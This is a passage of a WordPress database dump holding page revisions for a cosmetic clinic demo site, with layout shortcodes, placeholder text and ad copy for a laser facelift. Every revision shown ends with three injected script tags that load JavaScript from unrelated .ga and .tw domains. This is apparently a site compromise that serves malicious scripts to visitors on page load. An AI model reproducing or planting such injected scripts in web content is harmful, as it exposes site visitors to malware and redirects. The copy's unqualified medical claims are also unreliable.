icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633224484{padding-right: 0px !important;padding-left: 0px !important;}\"]\r\n<h4>4D Laser Face Lifting</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:13:50','2018-01-11 01:13:50','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6637,1,'2018-01-11 01:14:12','2018-01-11 01:14:12','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633247261{padding-top: 10px !important;padding-right: 10px !important;padding-bottom: 10px !important;padding-left: 10px !important;}\"]\r\n<h4>4D Laser Face Lifting</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:14:12','2018-01-11 01:14:12','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6638,1,'2018-01-11 01:14:28','2018-01-11 01:14:28','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633262229{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}\"]\r\n<h4>4D Laser Face Lifting</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:14:28','2018-01-11 01:14:28','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6639,1,'2018-01-11 01:15:14','2018-01-11 01:15:14','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633262229{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}\"]\r\n<h4>4D Laser Face Lifting</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633293772{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}\"]\r\n<h4>3D Rejuvenation</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633307261{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}\"]\r\n<h4>Anti Wrinkle Injection</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:15:14','2018-01-11 01:15:14','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6640,1,'2018-01-11 01:52:39','2018-01-11 01:52:39','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"steps\" row_name=\"Sign Up Steps\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-5-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In From Left\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_url=\"6247\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"-\" image_1_offset_y=\"55%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_offset_x_sign=\"+\" image_2_offset_x=\"50%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"35%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_offset_x_sign=\"-\" image_3_offset_x=\"35%\" image_3_offset_y_sign=\"+\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_url=\"6634\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"-\" image_1_offset_y=\"55%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_offset_x_sign=\"+\" image_2_offset_x=\"50%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"35%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_offset_x_sign=\"-\" image_3_offset_x=\"35%\" image_3_offset_y_sign=\"+\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 01:52:39','2018-01-11 01:52:39','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6641,1,'2018-01-11 01:53:08','2018-01-11 01:53:08','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_url=\"6247\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"-\" image_1_offset_y=\"55%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_offset_x_sign=\"+\" image_2_offset_x=\"50%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"35%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_offset_x_sign=\"-\" image_3_offset_x=\"35%\" image_3_offset_y_sign=\"+\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_url=\"6634\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"-\" image_1_offset_y=\"55%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_offset_x_sign=\"+\" image_2_offset_x=\"50%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"35%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_offset_x_sign=\"-\" image_3_offset_x=\"35%\" image_3_offset_y_sign=\"+\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 01:53:08','2018-01-11 01:53:08','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6642,1,'2018-01-11 01:53:36','2018-01-11 01:53:36','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_url=\"6247\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"-\" image_1_offset_y=\"55%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_offset_x_sign=\"+\" image_2_offset_x=\"50%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"35%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_offset_x_sign=\"-\" image_3_offset_x=\"35%\" image_3_offset_y_sign=\"+\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and 